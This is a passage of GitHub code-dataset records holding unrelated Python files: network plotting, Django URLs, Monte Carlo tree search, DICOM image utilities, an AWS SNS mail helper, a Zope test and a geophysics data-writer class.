[len(one_adjc) for one_adjc in list((nx.generate_adjlist(networkx_object)))] ### instead of \"group\"\n    pos_3d=nx.spring_layout(networkx_object, weight=\"weight\", dim=3)\n    nx.set_node_attributes(networkx_object, pos_3d, \"pos_3d\")\n    layt = [list(array) for array in pos_3d.values()]\n    N= len(networkx_object.nodes)\n    Xn=[layt[k][0] for k in range(N)]# x-coordinates of nodes\n    Yn=[layt[k][1] for k in range(N)]# y-coordinates\n    Zn=[layt[k][2] for k in range(N)]# z-coordinates\n    Xe=[]\n    Ye=[]\n    Ze=[]\n    for Edge in Edges:\n        Xe+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][0],networkx_object.nodes[Edge[1]][\"pos_3d\"][0], None]# x-coordinates of edge ends\n        Ye+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][1],networkx_object.nodes[Edge[1]][\"pos_3d\"][1], None]\n        Ze+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][2],networkx_object.nodes[Edge[1]][\"pos_3d\"][2], None]\n\n    ### to get the hover into the middle of the line\n    ### we have to produce a node in the middle of the line\n    ### based on https://stackoverflow.com/questions/46037897/line-hover-text-in-plotly\n\n    middle_node_trace = go.Scatter3d(\n        x=[],\n        y=[],\n        z=[],\n        opacity=0,\n        text=weight_list,\n        mode='markers',\n        hoverinfo='text',\n        marker=dict(\n            opacity=0\n        )\n    )\n\n    for Edge in Edges:\n\n        x0,y0,z0 = networkx_object.nodes[Edge[0]][\"pos_3d\"]\n        x1,y1,z1 = networkx_object.nodes[Edge[1]][\"pos_3d\"]\n        ###trace3['x'] += [x0, x1, None]\n        ###trace3['y'] += [y0, y1, None]\n        ###trace3['z'] += [z0, z1, None]\n        ###trace3_list.append(trace3)\n        middle_node_trace['x'] += tuple([(x0+x1)/2])\n        middle_node_trace['y'] += tuple([(y0+y1)/2])#.append((y0+y1)/2)\n        middle_node_trace['z'] += tuple([(z0+z1)/2])#.append((z0+z1)/2)\n    \n\n    ### edge trace \n    edge_trace1 = go.Scatter3d(\n        x=[], y=[], z=[],\n        #hoverinfo='none',\n        mode='lines',\n        line=dict(width=0.8,color=\"#000000\"),\n    )\n    edge_trace2 = go.Scatter3d(\n        x=[],y=[], z=[],\n        #hoverinfo='none',\n        mode='lines',\n        line=dict(width=0.5,color=\"#404040\"),\n    )\n    edge_trace3 = go.Scatter3d(\n        x=[], y=[], z=[],\n        #hoverinfo='none',\n        mode='lines',\n        line=dict(width=0.3,color=\"#C0C0C0\"),\n    )\n    best_5percent_norm_weight = sorted(list(networkx_object.edges.data(\"norm_weight\")), key=lambda x: x[2], reverse=True)[int((len(networkx_object.edges.data(\"norm_weight\")) / 100) * 5)][2]\n    best_20percent_norm_weight = sorted(list(networkx_object.edges.data(\"norm_weight\")), key=lambda x: x[2], reverse=True)[int((len(networkx_object.edges.data(\"norm_weight\")) / 100) * 20)][2]\n    for edge in
networkx_object.edges.data():\n if edge[2][\"norm_weight\"] >= best_5percent_norm_weight:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n else:\n if edge[2][\"norm_weight\"] >= best_20percent_norm_weight:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n else:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n \n\n ### node trace\n node_trace=go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers+text',\n ###name=labels,\n marker=dict(symbol='circle',\n size=6,\n color=adjc,\n colorscale='Earth',\n reversescale=True,\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=[],\n #textposition='bottom center',\n #hovertext=adjc,\n #hoverinfo='text'\n )\n for node in networkx_object.nodes():\n node_trace[\"text\"] += tuple([node])\n \n axis=dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n layout = go.Layout(\n title=\"\",\n width=1200,\n height=800,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n annotations=[\n dict(\n showarrow=False,\n text=\"\",\n xref='paper',\n yref='paper',\n x=0,\n y=0.1,\n xanchor='left',\n yanchor='bottom',\n font=dict(\n size=14\n )\n )\n ], )\n data=[edge_trace1, edge_trace2, edge_trace3, node_trace, middle_node_trace]\n fig=go.Figure(data=data, layout=layout)\n if mode==\"offline\":\n return plot(fig, filename=\"../\" + file_name+\"_3D.html\")\n if mode==\"online\":\n return py.iplot(fig, filename=file_name)\n if mode==\"eps\":\n return pio.write_image(fig, \"../\" + file_name + \"_3D.eps\" , scale=1)\n\ndef ego_network_standard(dataframe, prezident_name, term, neighbours):\n network = network_formation_df(dataframe, prezident_name, 200, 1)\n if \"term\" not in network.nodes():\n print(\"This term is not part of given network. Try another one.\")\n else:\n ego_network_drawing_reduced(network, term, neighbours, prezident_name + \" - \" + term, \"offline\")","repo_name":"kasev/czech_textual_networks","sub_path":"ego_networks_generator.py","file_name":"ego_networks_generator.py","file_ext":"py","file_size_in_byte":10622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27956874952","text":"from django.urls import path\n\nfrom . 
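# Two apparent slips in the ego-network module above: ego_network_standard
# tests the literal string "term" for membership, so the guard never checks the
# caller's argument, and every weight branch in draw_3d_network appends to
# edge_trace1, leaving edge_trace2 and edge_trace3 empty. A hedged fix for the
# first, reusing the module's own helpers:
def ego_network_standard(dataframe, prezident_name, term, neighbours):
    network = network_formation_df(dataframe, prezident_name, 200, 1)
    if term not in network.nodes():   # the variable, not the string "term"
        print("This term is not part of given network. Try another one.")
    else:
        ego_network_drawing_reduced(network, term, neighbours,
                                    prezident_name + " - " + term, "offline")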
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"createlisting\", views.createlisting, name=\"createlisting\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"item/<str:name>\", views.itempage, name=\"itempage\"),\n path(\"category\", views.category, name=\"category\"),\n path(\"category/<str:category>\", views.display_category, name=\"display_category\")\n]\n","repo_name":"OsafAliSayed/Auction","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42387616675","text":"from typing import Callable, Tuple\n\nimport parameters\nfrom TreeNode import TreeNode\nfrom world.simulated_world import SimulatedWorld\n\nPolicy = Callable[[Tuple[int, ...], Tuple[int, ...]], int] # (s, valid_actions) -> a\n\n\nclass MCTS:\n\n def __init__(self, initial_state: Tuple[int, ...]) -> None:\n self.root = TreeNode(initial_state)\n self.action_space = parameters.NUMBER_OF_ACTIONS\n\n def update_root(self, action: int) -> None:\n self.root = self.root.children[action]\n self.root.parent = None\n\n def get_normalized_distribution(self) -> Tuple[float, ...]:\n distribution = []\n for action in range(self.action_space):\n if action in self.root.children:\n distribution.append(float(self.root.children[action].visits) / float(self.root.visits))\n else:\n distribution.append(0.0)\n return tuple(distribution)\n\n def do_one_simulation(self, default_policy: Policy, world: SimulatedWorld) -> None:\n # Tree search\n current_node = self.root\n while current_node.is_not_leaf:\n action = current_node.tree_policy() # returns action to child node with highest UCT value\n world.step(action)\n current_node = current_node.children[action]\n\n # Node expansion. 
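# TreeNode.tree_policy() is not shown in this file; a common choice for the
# selection step it performs is UCT, taking the child that maximizes
# Q(s,a) + c * sqrt(ln(N_parent) / n_child). A sketch under that assumption
# (the visits/total_reward attribute names are illustrative, not from the
# source):
import math

def uct_select(children: dict, parent_visits: int, c: float = 1.4) -> int:
    def uct(node):
        if node.visits == 0:
            return float("inf")        # visit unexplored children first
        exploit = node.total_reward / node.visits
        explore = c * math.sqrt(math.log(parent_visits) / node.visits)
        return exploit + explore
    return max(children, key=lambda action: uct(children[action]))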
Always expand the root\n if not world.is_final_state() and (current_node.visits != 0 or current_node.parent is None):\n for action, legal in enumerate(world.get_legal_actions()):\n if bool(legal):\n current_node.add_node(action, world.generate_state(action))\n current_node = list(current_node.children.values())[0]\n\n # Rollout\n current_state = current_node.state\n while not world.is_final_state():\n legal_actions = world.get_legal_actions()\n action = default_policy(current_state, legal_actions)\n current_state, _ = world.step(action)\n\n # Backpropagation\n while current_node is not None:\n current_node.add_reward(world.get_winner_id())\n current_node.increment_visit_count()\n current_node = current_node.parent\n","repo_name":"nicklasbekkevold/MCTS","sub_path":"src/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19067178219","text":"import os\nimport shutil\nimport imageio\nimport pydicom\nimport numpy as np\nimport time\nimport pydicom\nfrom os.path import join\nfrom numpy import uint8\nfrom typing import List, Tuple\n\ndef get_id(path: str) -> Tuple[str, str]:\n f = pydicom.read_file(path, stop_before_pixels=True)\n return f.StudyInstanceUID, f.SeriesInstanceUID\n\n\ndef is_dicom_file(path: str) -> bool:\n \"\"\"Fast way to check whether file is DICOM.\"\"\"\n if not os.path.isfile(path):\n return False\n try:\n with open(path, \"rb\") as f:\n return f.read(132).decode(\"ASCII\")[-4:] == \"DICM\"\n except:\n return False\n\n\ndef dicom_files_in_dir(directory: str = \".\") -> List[str]:\n \"\"\"Full paths of all DICOM files in the directory.\"\"\"\n directory = os.path.expanduser(directory)\n candidates = [os.path.join(directory, f) for f in sorted(os.listdir(directory))]\n return [f for f in candidates if is_dicom_file(f)]\n\n\ndef dicom_to_bmp(dicomdir_path, desired_series):\n for root, _, files in os.walk(dicomdir_path):\n for file in files:\n if file == \"dicomdir\":\n dataset = pydicom.dcmread(join(root, file))\n break\n\n image_records = None\n\n patient_record = dataset.patient_records[0]\n study = patient_record.children[0]\n all_series = study.children\n for series in all_series:\n if series.SeriesDescription == desired_series:\n image_records = series.children\n break\n\n if image_records is None:\n raise IOError\n\n image_filenames = [join(dicomdir_path, *image_rec.ReferencedFileID)\n for image_rec in image_records]\n images = [pydicom.dcmread(image_filename)\n for image_filename in image_filenames]\n\n try:\n os.mkdir(\"Grid BMPs\")\n except FileExistsError:\n shutil.rmtree(\"Grid BMPs\")\n os.mkdir(\"Grid BMPs\")\n\n for frame_num, image in enumerate(images, 1):\n imageio.imwrite(join(\"Grid BMPs\", f\"Frame {str(frame_num).zfill(3)}.bmp\"),\n uint8(image.pixel_array))\n\n\ndef grid_images_to_folders(height_in_pixels, width_in_pixels, image_rows, image_cols):\n\n istep = height_in_pixels//image_rows\n jstep = width_in_pixels//image_cols\n\n try:\n os.mkdir(\"Split BMPs\")\n except FileExistsError:\n shutil.rmtree(\"Split BMPs\")\n os.mkdir(\"Split BMPs\")\n frame_number = 0\n for root, _, files in os.walk(\"Grid BMPs\"):\n for file in files:\n if file.endswith(\".bmp\"):\n frame_number += 1\n sub_im = imageio.imread(join(root, file))\n\n os.mkdir(f\"Split BMPs/Frame {str(frame_number).zfill(3)}\")\n slice_number = 1\n for i in range(0, height_in_pixels, istep):\n for j in range(0, width_in_pixels, jstep):\n imageio.imwrite(join(os.getcwd(), 
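# The two slicing loops in grid_images_to_folders above cut each frame into
# image_rows x image_cols tiles; the same split can be done with one numpy
# reshape. Equivalent sketch for a single frame (same row-major tile order):
import numpy as np

def split_grid(frame: np.ndarray, rows: int, cols: int) -> np.ndarray:
    h, w = frame.shape
    return (frame.reshape(rows, h // rows, cols, w // cols)
                 .swapaxes(1, 2)
                 .reshape(rows * cols, h // rows, w // cols))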
\"Split BMPs\",\n f\"Frame {str(frame_number).zfill(3)}\",\n f\"Slice {str(slice_number).zfill(3)}.bmp\"),\n sub_im[i:i+istep, j:j+jstep])\n slice_number += 1\n shutil.rmtree(\"Grid BMPs\")\n\n\ndef standard_deviation(std_dev_across_n_frames):\n frames = []\n\n for root, folders, _ in os.walk(\"Split BMPs\"):\n for folder in folders:\n if folder.startswith(\"Frame\"):\n frames.append(join(root, folder))\n\n output_frame_count = len(frames) // std_dev_across_n_frames\n\n try:\n os.mkdir(\"STD DEV\")\n except FileExistsError:\n shutil.rmtree(\"STD DEV\")\n os.mkdir(\"STD DEV\")\n\n for window in range(1, output_frame_count + 1):\n window_images = []\n for frame in frames[std_dev_across_n_frames * (window - 1): std_dev_across_n_frames * window]:\n frame_images = []\n for root, _, slices in os.walk(frame):\n for slic in slices:\n if slic.endswith(\".bmp\"):\n frame_images.append(imageio.imread(join(root, slic)))\n window_images.append(frame_images)\n\n window_images = np.array(window_images)\n output_images = np.empty(window_images.shape[1:])\n\n os.mkdir(join(\"STD DEV\", f\"Frame {str(window).zfill(3)}\"))\n\n for slice_number in range(output_images.shape[0]):\n for y in range(output_images.shape[1]):\n for x in range(output_images.shape[2]):\n output_images[slice_number, y, x] = np.std(\n window_images[:, slice_number, y, x])\n\n output_images *= 255.0/output_images.max()\n output_images = uint8(output_images)\n\n for slice_number in range(output_images.shape[0]):\n imageio.imwrite(join(\"STD DEV\", f\"Frame {str(window).zfill(3)}\",\n f\"Slice {str(slice_number + 1).zfill(3)}.bmp\"), output_images[slice_number])\n\n shutil.rmtree(\"Split BMPs\")\n","repo_name":"achouman34/capstone","sub_path":"Final Project/SlicerVR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37392722459","text":"#coding=utf-8 \r\nimport awsservices\r\nimport logging\r\n#topic:String:SNS中的主题,格式为:'arn:aws-cn:sns:cn-north-1:303361436695:Managers_ALL',后面的Managers_ALL是主题名称\r\n#subject:String:这个是邮件的主题\r\n#message:String:这个是邮件正文,换行使用\\n\r\ndef SendEmail(topic='arn:aws-cn:sns:cn-north-1:303361436695:dynamodb',subject='',message=''):\r\n loginfo = logging.getLogger('deploy')\r\n logdeploy = logging.getLogger('lastdeploy')\r\n logerror = logging.getLogger('errorinfo')\r\n try:\r\n loginfo.info(\"Mail Sent: %s\" % subject)\r\n logdeploy.info(\"Mail Sent: %s\" % subject)\r\n awsservices.get_awsclient('sns').publish(TopicArn=topic,Message=message,Subject=subject)\r\n except Exception as e:\r\n loginfo.info(\"Mail Error: %s\" % e)\r\n logdeploy.info(\"Mail Error: %s\" % e)\r\n logerror.info(\"Mail Error: %s\" % e)","repo_name":"travis103/travis103.github.io","sub_path":"python/DevOps/functions/SendSNS.py","file_name":"SendSNS.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31354323589","text":"from zope.app.testing import ztapi\nfrom unittest import TestCase, TestSuite, main, makeSuite\nfrom zope.app.component.browser.registration import EditRegistration\nfrom zope.app.container.interfaces import IContainer\nfrom zope.app.container.interfaces import IObjectRemovedEvent\nfrom zope.app.component.interfaces.registration import ActiveStatus\nfrom zope.app.traversing.interfaces import IContainmentRoot\nfrom zope.app.site.tests.placefulsetup import PlacefulSetup\nfrom zope.interface import 
Interface, implements\nfrom zope.app.publisher.browser import BrowserView\nfrom zope.publisher.browser import TestRequest\nfrom zope.app.container.contained import Contained\n\nclass Container(dict):\n implements(IContainer, IContainmentRoot)\n\nclass I(Interface):\n pass\n\nclass C(Contained):\n implements(I)\n status = ActiveStatus\n\n\nclass Test(PlacefulSetup, TestCase):\n\n def test_remove_objects(self):\n c1 = C()\n c2 = C()\n c7 = C()\n d = Container({'1': c1, '2': c2, '7': c7})\n view = EditRegistration(d, TestRequest())\n view.remove_objects(['2', '7'])\n self.assertEqual(d, {'1': c1})\n\n def test_registrationInfo(self):\n\n class V(BrowserView):\n def setPrefix(self, p):\n self._prefix = p\n\n ztapi.browserView(I, 'ItemEdit', V)\n\n c1 = C()\n c2 = C()\n c7 = C()\n d = Container({'1': c1, '2': c2, '7': c7})\n c1.__parent__ = d; c1.__name__ = '1'\n c2.__parent__ = d; c2.__name__ = '2'\n c7.__parent__ = d; c7.__name__ = '7'\n\n view = EditRegistration(d, TestRequest())\n\n info = view.registrationInfo()\n self.assertEqual(len(info), 3)\n self.assertEqual(info[0]['name'], '1')\n self.assertEqual(info[1]['name'], '2')\n self.assertEqual(info[2]['name'], '7')\n\ndef test_suite():\n return TestSuite((\n makeSuite(Test),\n ))\n\nif __name__=='__main__':\n main(defaultTest='test_suite')\n","repo_name":"wpjunior/proled","sub_path":"Zope-2.9/lib/python/zope/app/component/browser/tests/test_editregistration.py","file_name":"test_editregistration.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23698435556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 24 08:18:04 2016\r\n\r\n@author: npop\r\n\r\nclass DataWriter\r\nParent class for data writers\r\nNOTE: all data formats written have the same headers\r\nWriting of ats style xml headers is not supported\r\n\"\"\"\r\nimport os\r\nimport glob\r\nimport struct\r\nimport xml.etree.ElementTree as ET\r\nfrom datetime import datetime, timedelta\r\nimport numpy as np\r\n# utils\r\nfrom utilsIO import *\r\n\r\nclass DataWriter(object):\r\n\r\n\t###################\r\n\t### CONSTRUCTOR\r\n\t##################\r\n\tdef __init__(self):\r\n\t\tself.outPath = \"\"\r\n\t\t# in subclasses, extension might change\r\n\t\t# i.e. 
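# Back in the DICOM utils module above, standard_deviation computes the
# per-pixel standard deviation with three nested Python loops; numpy performs
# the same reduction in one vectorized call along the frame axis. Equivalent
# sketch:
import numpy as np

def window_std(window_images: np.ndarray) -> np.ndarray:
    # window_images: (n_frames, n_slices, height, width)
    out = np.std(window_images, axis=0)          # -> (n_slices, height, width)
    out *= 255.0 / out.max()
    return np.uint8(out)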
.ats\r\n\t\tself.extension = \".dat\"\r\n\t\t# data type - the format of the data being written out\r\n\t\tself.dtype = np.int32\r\n\t\t# information about data being written\r\n\t\tself.headers = None\r\n\t\tself.chans = None\r\n\t\tself.chanMap = None\r\n\t\tself.chanHeaders = None\r\n\r\n\r\n\t###################\r\n\t### GET FUNCTIONS\r\n\t##################\r\n\tdef getOutPath(self):\r\n\t\treturn self.outPath\r\n\r\n\r\n\t###################\r\n\t### SET FUNCTIONS\r\n\t##################\r\n\tdef setOutPath(self, path):\r\n\t\tself.outPath = path\r\n\r\n\tdef setGlobalHeadersFromKeywords(self, headers, keywords):\r\n\t\tglobalHeaderwords = self.globalHeaderwords()\r\n\t\tfor gH in globalHeaderwords:\r\n\t\t\thdrVal = \"\"\r\n\t\t\tif gH in headers:\r\n\t\t\t\thdrVal = headers[gH]\r\n\t\t\tif gH in keywords:\r\n\t\t\t\thdrVal = keywords[gH]\r\n\t\t\theaders[gH] = hdrVal\r\n\t\treturn headers\t\r\n\r\n\tdef setChanHeadersFromKeywords(self, chanHeaders, keywords):\r\n\t\tchanHeaderwords = self.chanHeaderwords()\r\n\t\tfor iChan in xrange(0, len(chanHeaders)):\r\n\t\t\tfor cH in chanHeaderwords:\r\n\t\t\t\thdrVal = \"\"\r\n\t\t\t\tif cH in chanHeaders[iChan]:\r\n\t\t\t\t\thdrVal = chanHeaders[iChan][cH]\r\n\t\t\t\tif cH in keywords:\r\n\t\t\t\t\thdrVal = keywords[cH]\r\n\t\t\t\tchanHeaders[iChan][cH] = hdrVal\r\n\t\treturn chanHeaders\r\n\r\n\r\n\t###################\r\n\t### CALCULATION METHODS\r\n\t##################\r\n\tdef calcStopDateTime(self, fs, numSamples, datetimeStart):\r\n\t\t# calculate duration in seconds\r\n\t\tduration = 1.0*(numSamples-1)/fs # numSamples - 1 because have to remove the initial sample which is taken at start time\r\n\t\tdatetimeStop = datetimeStart + timedelta(seconds=duration)\r\n\t\t# now get this in start and stop times\r\n\t\tstopDate = datetimeStop.strftime(\"%Y-%m-%d\") \t\r\n\t\tstopTime = datetimeStop.strftime(\"%H:%M:%S.%f\")\r\n\t\treturn datetimeStop, stopDate, stopTime\r\n\r\n\r\n\t###################\r\n\t### HEADERWORDS SUPPORTED\r\n\t###################\r\n\tdef globalHeaderwords(self):\r\n\t\tgHeaders = [\"sample_freq\", \"num_samples\", \"start_time\", \"start_date\", \"stop_time\", \"stop_date\", \"meas_channels\"]\r\n\t\treturn gHeaders\r\n\r\n\tdef chanHeaderwords(self):\r\n\t\tcHeaders = [\"sample_freq\", \"num_samples\", \"start_time\", \"start_date\", \"stop_time\", \"stop_date\", \"ats_data_file\", \"sensor_type\", \"channel_type\",\"ts_lsb\", \"lsb_applied\",\r\n\t\t\t \"pos_x1\", \"pos_x2\", \"pos_y1\", \"pos_y2\", \"pos_z1\", \"pos_z2\", \"sensor_sernum\", \"gain_stage1\", \"gain_stage2\", \"hchopper\", \"echopper\"]\r\n\t\treturn cHeaders\t\r\n\r\n\r\n\t###################\r\n\t### WRITE DATA\r\n\t###################\r\n\tdef writeDataset(self, reader, **kwargs):\r\n\t\tif self.getOutPath() == \"\":\r\n\t\t\tself.printWarning(\"No output filepath given\")\r\n\t\t\treturn\r\n\t\t# make the directory\r\n\t\tcheckAndMakeDir(self.getOutPath())\r\n\t\t# write using information from a reader file\r\n\t\theaders = reader.getHeaders()\r\n\t\tchanHeaders, chanMap = reader.getChanHeaders()\r\n\t\tchans = reader.getChannels()\r\n\t\t# now write depending on whether lsb_applied or not\r\n\t\tif \"lsb_applied\" in kwargs and kwargs[\"lsb_applied\"]:\r\n\t\t\tself.write(headers, chanHeaders, chanMap, reader.getPhysicalSamples(), **kwargs)\r\n\t\t\tself.dtype = np.float32\r\n\t\telse:\r\n\t\t\tself.write(headers, chanHeaders, chanMap, reader.getUnscaledSamples(), **kwargs)\r\n\r\n\tdef writeData(self, headers, chanHeaders, data, 
**kwargs):\r\n\t\tif self.getOutPath() == \"\":\r\n\t\t\tself.printWarning(\"No output filepath given\")\r\n\t\t\treturn\r\n\t\t# make the directory\r\n\t\tcheckAndMakeDir(self.getOutPath())\r\n\t\t# calculate our own cMap\r\n\t\tchanMap = {}\r\n\t\tfor iChan in xrange(0, len(chanHeaders)):\r\n\t\t\tchanType = chanHeaders[iChan]['channel_type']\t\t\r\n\t\t\tchanMap[chanType] = iChan \r\n\t\t# check the data type\r\n\t\tif \"lsb_applied\" in kwargs and kwargs[\"lsb_applied\"]:\r\n\t\t\tself.dtype = np.float32\t\t\r\n\t\t# write the data\r\n\t\tself.write(headers, chanHeaders, chanMap, data, **kwargs)\r\n\r\n\t# write out the dataset\r\n\tdef write(self, headers, chanHeaders, chanMap, data, **kwargs):\r\n\t\t# set global headers for keyword arguments\r\n\t\theaders = self.setGlobalHeadersFromKeywords(headers, kwargs)\r\n\t\t# set channel headers for keyword arguments\r\n\t\tchanHeaders = self.setChanHeadersFromKeywords(chanHeaders, kwargs)\r\n\r\n\t\t# now overwrite the options by checking the actual data\r\n\t\t# let's check all the data sizes\r\n\t\tchans = sorted(list(data.keys()))\r\n\t\tdataSizes = []\r\n\t\tfor c in chans:\r\n\t\t\tdataSizes.append(data[c].size)\r\n\t\tif min(dataSizes) != max(dataSizes):\r\n\t\t\tself.printWarning(\"Channels do not have the same number of samples: {} - {}\".format(\", \".join(chans), \", \".join(dataSizes)))\r\n\t\t\tself.printWarning(\"Only the smallest number of samples will be written out\")\r\n\t\tnumSamples = min(dataSizes)\r\n\r\n\t\t# set number of samples from actual data\r\n\t\theaders[\"num_samples\"] = numSamples\r\n\r\n\t\t# limit data and set the chan header \r\n\t\tfor c in chans:\r\n\t\t\tdata[c] = data[c][:numSamples]\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\tchanHeaders[cIndex][\"num_samples\"] = numSamples\r\n\r\n\t\t# deal with start and end time\r\n\t\t# the start time does not change on resampling, only the end time\r\n\t\tduration = numSamples/headers[\"sample_freq\"]\r\n\t\t# create datetime objects\r\n\t\tstartString = '{} {}'.format(headers[\"start_date\"], headers[\"start_time\"])\r\n\t\tstopString = '{} {}'.format(headers[\"stop_date\"], headers[\"stop_time\"])\r\n\t\tdatetimeStart = datetime.strptime(startString, \"%Y-%m-%d %H:%M:%S.%f\")\r\n\t\tdatetimeStop = datetime.strptime(stopString, \"%Y-%m-%d %H:%M:%S.%f\")\r\n\t\tdatetimeRecalc, stopDate, stopTime = self.calcStopDateTime(headers[\"sample_freq\"], numSamples, datetimeStart)\r\n\t\t# compare to datetimeStop already\r\n\t\tif datetimeRecalc != datetimeStop:\r\n\t\t\tself.printWarning(\"Note, discrepancy between stop time in given headers and those calculated from data\")\r\n\t\t\tself.printWarning(\"Causes of this might be resampling or interpolation processes and the limiting of data\")\r\n\t\t\tself.printWarning(\"Stop time calculated from data will be used\")\r\n\t\t\tself.printWarning(\"If no resampling, interpolation or limiting of data has been performed, please check all times\")\r\n\t\theaders[\"stop_date\"] = stopDate\r\n\t\theaders[\"stop_time\"] = stopTime\r\n\t\t# do the same for the chan headers\r\n\t\tfor c in chans:\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\tchanHeaders[cIndex][\"stop_date\"] = stopDate\r\n\t\t\tchanHeaders[cIndex][\"stop_time\"] = stopTime\r\n\r\n\t\t# finally, check the number of measurement channels \r\n\t\theaders[\"meas_channels\"] = len(chans) \r\n\r\n\t\t# now write out the headers and save to class variables\r\n\t\tself.writeHeaders(headers, chans, chanMap, chanHeaders)\r\n\t\tself.headers = headers\r\n\t\tself.chans = 
chans\r\n\t\tself.chanMap = chanMap\r\n\t\tself.chanHeaders = chanHeaders\r\n\r\n\t\t# write out the data files\r\n\t\tself.writeDataFiles(chans, data)\r\n\r\n\t# write out the header files\r\n\tdef writeHeaders(self, headers, chans, chanMap, chanHeaders):\r\n\t\t# write out the global headers\r\n\t\tf = open(os.path.join(self.getOutPath(), \"global.hdr\"), \"w\")\r\n\t\tf.write(\"HEADER = GLOBAL\\n\")\r\n\t\tglobalHeaderwords = self.globalHeaderwords()\r\n\t\tfor gH in globalHeaderwords:\r\n\t\t\tf.write(\"{} = {}\\n\".format(gH, headers[gH]))\r\n\t\tf.close()\r\n\r\n\t\t# write out the channel headers\r\n\t\tchanHeaderwords = self.chanHeaderwords()\r\n\t\tfor idx, c in enumerate(chans):\r\n\t\t\tcf = open(os.path.join(self.getOutPath(), \"chan_{:02d}.hdr\".format(idx)), \"w\")\r\n\t\t\tcf.write(\"HEADER = CHANNEL\\n\")\r\n\t\t\t# now need to use the cMap to get the index of the cHeaders array\r\n\t\t\tcIndex = chanMap[c]\r\n\t\t\t# change the data file\r\n\t\t\tchanHeaders[cIndex][\"ats_data_file\"] = \"chan_{:02d}{}\".format(idx, self.extension)\r\n\t\t\tfor cH in chanHeaderwords:\r\n\t\t\t\tcf.write(\"{} = {}\\n\".format(cH, chanHeaders[cIndex][cH]))\r\n\t\t\tcf.close()\r\n\t\treturn True\r\n\r\n\tdef writeDataFiles(self, chans, data):\r\n\t\t# implement in the child class\r\n\t\treturn\r\n\r\n\t###################\r\n\t### DEBUG\r\n\t##################\t\t\r\n\t# print headers\r\n\tdef printInfo(self):\t\t\r\n\t\t# print the headers\r\n\t\tself.printInfoBegin()\r\n\t\tself.printText(\"Output file path for data = {}\".format(self.getOutPath()))\r\n\t\t# if it exists, print out the headers\r\n\t\tif self.headers:\r\n\t\t\tself.printText(\"Global Headers\")\r\n\t\t\tself.printText(self.headers)\r\n\t\t# if exists, print out a list of chans\r\n\t\tif self.chans:\r\n\t\t\tself.printText(\"Channels found:\")\r\n\t\t\tself.printText(self.chans)\r\n\t\t# if exists, print out the chanMap\r\n\t\tif self.chanMap:\r\n\t\t\tself.printText(\"Channel Map\")\r\n\t\t\tself.printText(self.chanMap)\r\n\t\t# if it exists, print out the chanHeaders\r\n\t\tif self.chanHeaders:\r\n\t\t\tself.printText(\"Channel Headers\")\r\n\t\t\tfor c in self.chans:\t\t\r\n\t\t\t\tself.printText(c)\r\n\t\t\t\tself.printText(self.chanHeaders[self.chanMap[c]])\r\n\t\tself.printInfoEnd()\r\n\r\n\tdef printInfoBegin(self):\r\n\t\tself.printText(\"####################\")\t\r\n\t\tself.printText(\"DATA WRITER INFO BEGIN\")\t\t\r\n\t\tself.printText(\"####################\")\t\r\n\r\n\tdef printInfoEnd(self):\r\n\t\tself.printText(\"####################\")\r\n\t\tself.printText(\"DATA WRITER INFO END\")\t\t\r\n\t\tself.printText(\"####################\")\t\t\t\r\n\t\t\r\n\tdef printText(self, infoStr):\r\n\t\tgeneralPrint(\"Data Writer Info\", infoStr)\r\n\r\n\tdef printWarning(self, warnStr):\r\n\t\twarningPrint(\"Data Writer Warning\", warnStr)","repo_name":"geobook2015/magPy","sub_path":"core/dataWriter.py","file_name":"dataWriter.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"71854180921","text":"#Script de recuperation des donnees u* et calcul de U+ et y+\n\nimport optparse\n#import math\nfrom math import *\n\nimport os\n\ndef properties():\n # ouverture des fichiers\n nomFic = 'propertiesGeometry.dat'\n\n fic 